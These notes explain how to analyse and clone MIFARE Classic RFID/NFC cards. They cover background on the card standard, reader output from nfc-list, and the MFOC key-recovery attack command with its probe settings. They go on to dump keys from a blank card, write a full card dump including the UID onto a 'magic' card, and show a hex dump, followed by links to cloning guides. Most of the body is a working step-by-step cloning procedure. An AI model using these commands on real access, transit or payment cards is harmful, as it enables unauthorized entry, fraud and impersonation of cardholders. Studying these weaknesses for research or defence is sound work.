MIFARE Classicカードの分析です。要点と情報源をまとめました。
Technical Background
- Introduced in 1995 by NXP
- “Advanced technology for RFID identification”
- Based on ISO/IEC 14443 Type A 13.56 MHz standard
NFC Utilities
Backtrack ... Linux Distribution for Penetration Testing tools
VMware image at offensive security
Download Location
Latest image
Checking card on the reader
george@netbook-linux ~/nfc/libnfc-1.7.0-rc7 $ sudo nfc-list
nfc-list uses libnfc 1.7.0-rc7
NFC device: ACS / ACR122U PICC Interface opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 3e d1 11 f3
SAK (SEL_RES): 08
Dump RFID/NFC Card Data
Place your card on your reader, then run MFOC using the following command;
sudo ./mfoc -P 500 -O dump.mfd
The -P flag specifies the number of probes used in the attack. The more probes used, the faster the attack will complete at the expense of system resources. The default is 20 and it can greatly speed up the attack to use a larger number.
The -O flag will specify the name of the file that you are dumping the card data to.
Dump Blank Card Keys
Remember that in order to write data to a card, you must hold the keys for each sector. Blank cards usually contain a series of default keys, so dumping them to a file using MFOC takes just seconds. To dump the keys to a file, run the following command;
sudo ./mfoc -P 500 -O keys.mfd
Clone RFID/NFC Card Data
To copy the card data onto a blank card INCLUDING the UID (providing you are using a magic card), run the following command;
sudo ./nfc-mfclassic W A path/to/dump.mfd path/to/keys.mfd
Display dump data by Hex and Ascii
root@kali:~# od -v -t x1z -Ax keys-test.mfd
000000 53 54 61 68 0e 08 04 00 69 73 73 69 35 36 34 30 >STah....issi5640<
000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >................<
000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >................<
000030 ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff >.........i......<
000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >................<
000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >................<
000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >................<
000070 ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff >.........i......<
000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >................<
000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >................<
Reference information
Hacking the NFC cards for fun and honor degrees
George Smart - NFC Experiments
Robospatula - How to Clone MIFARE Classic RFID/NFC Cards
alphazo / gist:3303282 dump card, reading keys